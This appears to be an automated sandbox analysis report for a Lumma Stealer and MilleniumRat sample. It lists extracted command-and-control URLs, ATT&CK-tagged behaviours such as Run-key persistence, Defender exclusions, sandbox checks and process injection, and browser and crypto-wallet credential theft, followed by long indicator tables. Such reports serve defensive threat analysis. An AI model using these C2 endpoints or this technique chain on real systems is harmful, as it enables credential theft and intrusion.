lumma | e12feda2ae6dfb6ec7b896d5faad599371a5306ac4a91f27a146b2f781032ef4

Analysis

max time kernel
1800s
max time network
1803s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
17-06-2024 12:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

meow.txt
Size

46B
MD5

ae43edc66c83c74123acf471a5bf0c69
SHA1

d52923a57f2f024872ece58730f94e567255cc0f
SHA256

e12feda2ae6dfb6ec7b896d5faad599371a5306ac4a91f27a146b2f781032ef4
SHA512

4793a4647bc006a625db1d2c302017151b9b21d2c472782f44f77ce28fcc19c6458610e7f94106ab1e8a513833df55a718fe6de6d2aed4f93b3af28e763f0bc9

Score

10^/10

lumma milleniumrat discovery evasion execution persistence pyinstaller rat spyware stealer upx

Malware Config

Extracted

Family

lumma

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://affordcharmcropwo.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

Signatures

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 2348 created 5400 2348 svchost.exe chrome.exe

description	pid	process	target process
PID 2348 created 5400	2348	svchost.exe	chrome.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 26 IoCs

Processes:

setup.exeupdater.exedialer.exeupdater.exe

description	pid	process	target process
PID 6792 created 3460	6792	setup.exe	Explorer.EXE
PID 6792 created 3460	6792	setup.exe	Explorer.EXE
PID 6792 created 3460	6792	setup.exe	Explorer.EXE
PID 6792 created 3460	6792	setup.exe	Explorer.EXE
PID 6792 created 3460	6792	setup.exe	Explorer.EXE
PID 6792 created 3460	6792	setup.exe	Explorer.EXE
PID 3296 created 3460	3296	updater.exe	Explorer.EXE
PID 3296 created 3460	3296	updater.exe	Explorer.EXE
PID 3296 created 3460	3296	updater.exe	Explorer.EXE
PID 3296 created 3460	3296	updater.exe	Explorer.EXE
PID 3296 created 3460	3296	updater.exe	Explorer.EXE
PID 3296 created 3460	3296	updater.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 3696 created 3460	3696	dialer.exe	Explorer.EXE
PID 6384 created 3460	6384	updater.exe	Explorer.EXE
PID 6384 created 3460	6384	updater.exe	Explorer.EXE
PID 6384 created 3460	6384	updater.exe	Explorer.EXE
PID 6384 created 3460	6384	updater.exe	Explorer.EXE
PID 6384 created 3460	6384	updater.exe	Explorer.EXE

Contacts a large (14432) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
7772	powershell.exe
5628	powershell.exe
11376	powershell.exe
3884	powershell.exe
10800	powershell.exe
11412	powershell.exe
1692	powershell.exe
4980	powershell.exe
6432	powershell.exe
6676	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Build.exes.exemain.exeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	s.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	main.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Update.exe

Drops startup file 4 IoCs

Processes:

Arixo.exebound.exeArixo.exeArixo.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arixo.exe	Arixo.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bound.exe	bound.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arixo.exe	Arixo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arixo.exe	Arixo.exe

Executes dropped EXE 27 IoCs

Processes:

Build.exehacn.exebased.exehacn.exebased.exes.exemain.exebound.exesvchost.exebound.exesvchost.exesetup.exeUpdate.exerar.exeupdater.exeArixo.exeArixo.exeArixo.exeArixo.exeArixo.exeArixo.exexeno rat server.exe ‎  .scrLoader.exeLoader.exeLoader.exeupdater.exe

pid	process
616	Build.exe
5960	hacn.exe
7008	based.exe
632	hacn.exe
6820	based.exe
6148	s.exe
6772	main.exe
2320	bound.exe
4628	svchost.exe
1948	bound.exe
5284	svchost.exe
6792	setup.exe
5680	Update.exe
9156	rar.exe
3296	updater.exe
616	Arixo.exe
5224	Arixo.exe
916	Arixo.exe
5028	Arixo.exe
9680	Arixo.exe
5920	Arixo.exe
1952	xeno rat server.exe
8780	‎  .scr
6964	Loader.exe
4488	Loader.exe
6996	Loader.exe
6384	updater.exe

Loads dropped DLL 64 IoCs

Processes:

main.exehacn.exebased.exemain.exebound.exesvchost.exe

pid	process
5828	main.exe
5828	main.exe
632	hacn.exe
632	hacn.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6820	based.exe
6772	main.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
5284	svchost.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe
1948	bound.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 42 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI26482\python310.dll	upx
behavioral2/memory/5828-548-0x00007FFD38D10000-0x00007FFD39176000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26482\libcrypto-1_1.dll	upx
behavioral2/memory/6820-609-0x00007FFD388B0000-0x00007FFD38D16000-memory.dmp	upx
behavioral2/memory/6820-619-0x00007FFD535B0000-0x00007FFD535BF000-memory.dmp	upx
behavioral2/memory/6820-618-0x00007FFD4BDF0000-0x00007FFD4BE14000-memory.dmp	upx
behavioral2/memory/6820-627-0x00007FFD4BF90000-0x00007FFD4BFA8000-memory.dmp	upx
behavioral2/memory/6820-628-0x00007FFD4BF50000-0x00007FFD4BF6F000-memory.dmp	upx
behavioral2/memory/6820-631-0x00007FFD51270000-0x00007FFD5127D000-memory.dmp	upx
behavioral2/memory/6820-632-0x00007FFD4B550000-0x00007FFD4B57E000-memory.dmp	upx
behavioral2/memory/6820-629-0x00007FFD4B580000-0x00007FFD4B6FA000-memory.dmp	upx
behavioral2/memory/6820-633-0x00007FFD4B490000-0x00007FFD4B548000-memory.dmp	upx
behavioral2/memory/6820-634-0x00007FFD38530000-0x00007FFD388A9000-memory.dmp	upx
behavioral2/memory/6820-630-0x00007FFD4BD10000-0x00007FFD4BD29000-memory.dmp	upx
behavioral2/memory/6820-626-0x00007FFD4BD30000-0x00007FFD4BD5C000-memory.dmp	upx
behavioral2/memory/6820-636-0x00007FFD4BCF0000-0x00007FFD4BD05000-memory.dmp	upx
behavioral2/memory/6820-637-0x00007FFD502F0000-0x00007FFD502FD000-memory.dmp	upx
behavioral2/memory/6820-643-0x00007FFD3C5E0000-0x00007FFD3C6F8000-memory.dmp	upx
behavioral2/memory/6820-2233-0x00007FFD388B0000-0x00007FFD38D16000-memory.dmp	upx
behavioral2/memory/6820-2312-0x00007FFD4BDF0000-0x00007FFD4BE14000-memory.dmp	upx
behavioral2/memory/6820-2400-0x00007FFD4BF50000-0x00007FFD4BF6F000-memory.dmp	upx
behavioral2/memory/6820-2543-0x00007FFD4B490000-0x00007FFD4B548000-memory.dmp	upx
behavioral2/memory/6820-2547-0x00007FFD3C5E0000-0x00007FFD3C6F8000-memory.dmp	upx
behavioral2/memory/6820-2546-0x00007FFD502F0000-0x00007FFD502FD000-memory.dmp	upx
behavioral2/memory/6820-2545-0x00007FFD4BCF0000-0x00007FFD4BD05000-memory.dmp	upx
behavioral2/memory/6820-2544-0x00007FFD38530000-0x00007FFD388A9000-memory.dmp	upx
behavioral2/memory/6820-2542-0x00007FFD4B550000-0x00007FFD4B57E000-memory.dmp	upx
behavioral2/memory/6820-2541-0x00007FFD51270000-0x00007FFD5127D000-memory.dmp	upx
behavioral2/memory/6820-2540-0x00007FFD4BD10000-0x00007FFD4BD29000-memory.dmp	upx
behavioral2/memory/6820-2539-0x00007FFD4B580000-0x00007FFD4B6FA000-memory.dmp	upx
behavioral2/memory/6820-2538-0x00007FFD4BF50000-0x00007FFD4BF6F000-memory.dmp	upx
behavioral2/memory/6820-2537-0x00007FFD4BF90000-0x00007FFD4BFA8000-memory.dmp	upx
behavioral2/memory/6820-2536-0x00007FFD4BD30000-0x00007FFD4BD5C000-memory.dmp	upx
behavioral2/memory/6820-2535-0x00007FFD535B0000-0x00007FFD535BF000-memory.dmp	upx
behavioral2/memory/6820-2534-0x00007FFD4BDF0000-0x00007FFD4BE14000-memory.dmp	upx
behavioral2/memory/6820-2533-0x00007FFD388B0000-0x00007FFD38D16000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

Processes:

flow	ioc
1661	discord.com
1667	discord.com
617	discord.com
1521	discord.com
1568	discord.com
1643	discord.com
1645	discord.com
1652	discord.com
1674	discord.com
1450	discord.com
1502	discord.com
3756	camo.githubusercontent.com
3963	raw.githubusercontent.com
668	discord.com
676	discord.com
1493	discord.com
1660	discord.com
709	discord.com
1650	discord.com
614	discord.com
667	discord.com
3754	camo.githubusercontent.com
577	raw.githubusercontent.com
1454	discord.com
1656	discord.com
573	raw.githubusercontent.com
1619	discord.com
1517	discord.com
1629	discord.com
1639	discord.com
1457	discord.com
1613	discord.com
3757	camo.githubusercontent.com
661	discord.com
662	discord.com
1510	discord.com
1610	discord.com
1636	discord.com
1657	discord.com
609	discord.com
645	discord.com
646	discord.com
1445	discord.com
1524	discord.com
1573	discord.com
1630	discord.com
3755	camo.githubusercontent.com
629	discord.com
1451	discord.com
1449	discord.com
1608	discord.com
8181	camo.githubusercontent.com
1663	discord.com
1666	discord.com
644	discord.com
648	discord.com
1640	discord.com
1649	discord.com
659	discord.com
1443	discord.com
1569	discord.com
1638	discord.com
625	discord.com
1616	discord.com

Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

587 api.ipify.org
1379 api.ipify.org
1496 api.ipify.org
1553 api.ipify.org
563 ip-api.com
575 api.ipify.org
576 api.ipify.org

flow	ioc
587	api.ipify.org
1379	api.ipify.org
1496	api.ipify.org
1553	api.ipify.org
563	ip-api.com
575	api.ipify.org
576	api.ipify.org

Drops file in System32 directory 9 IoCs

Processes:

powershell.exexeno rat server.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\Config.json	xeno rat server.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Config.json	xeno rat server.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

5284 svchost.exe

pid	process
5284	svchost.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

setup.exeupdater.exeupdater.exe

description	pid	process	target process
PID 6792 set thread context of 11164	6792	setup.exe	dialer.exe
PID 3296 set thread context of 6492	3296	updater.exe	dialer.exe
PID 3296 set thread context of 3696	3296	updater.exe	dialer.exe
PID 3296 set thread context of 6176	3296	updater.exe	dialer.exe
PID 6384 set thread context of 7036	6384	updater.exe	dialer.exe
PID 6384 set thread context of 1804	6384	updater.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

setup.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe setup.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
11100	sc.exe
11116	sc.exe
5420	sc.exe
6664	sc.exe
11120	sc.exe
3356	sc.exe
10320	sc.exe
528	sc.exe
4900	sc.exe
11080	sc.exe
4184	sc.exe
5168	sc.exe
6224	sc.exe
5388	sc.exe
4156	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller
C:\Users\Admin\Downloads\Arixo.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exewerfault.exeUpdate.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	werfault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	werfault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	werfault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

216 schtasks.exe
11928 schtasks.exe
4280 schtasks.exe
11244 schtasks.exe
6512 schtasks.exe
10288 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6460 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

9872 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3056 tasklist.exe
7112 tasklist.exe
5272 tasklist.exe
8640 tasklist.exe

pid	process
216	schtasks.exe
11928	schtasks.exe
4280	schtasks.exe
11244	schtasks.exe
6512	schtasks.exe
10288	schtasks.exe

pid	process
6460	timeout.exe

pid	process
9872	WMIC.exe

pid	process
3056	tasklist.exe
7112	tasklist.exe
5272	tasklist.exe
8640	tasklist.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

werfault.exechrome.exechrome.exechrome.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	werfault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	werfault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

5052 systeminfo.exe

pid	process
5052	systeminfo.exe

Kills process with taskkill 27 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
11672	taskkill.exe
3640	taskkill.exe
6044	taskkill.exe
11448	taskkill.exe
5532	taskkill.exe
7252	taskkill.exe
7016	taskkill.exe
8020	taskkill.exe
8232	taskkill.exe
8404	taskkill.exe
8744	taskkill.exe
6980	taskkill.exe
6172	taskkill.exe
8540	taskkill.exe
8704	taskkill.exe
8900	taskkill.exe
3340	taskkill.exe
7712	taskkill.exe
7588	taskkill.exe
8136	taskkill.exe
8324	taskkill.exe
11984	taskkill.exe
7436	taskkill.exe
7272	taskkill.exe
11040	taskkill.exe
7880	taskkill.exe
9036	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeOfficeClickToRun.exechrome.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
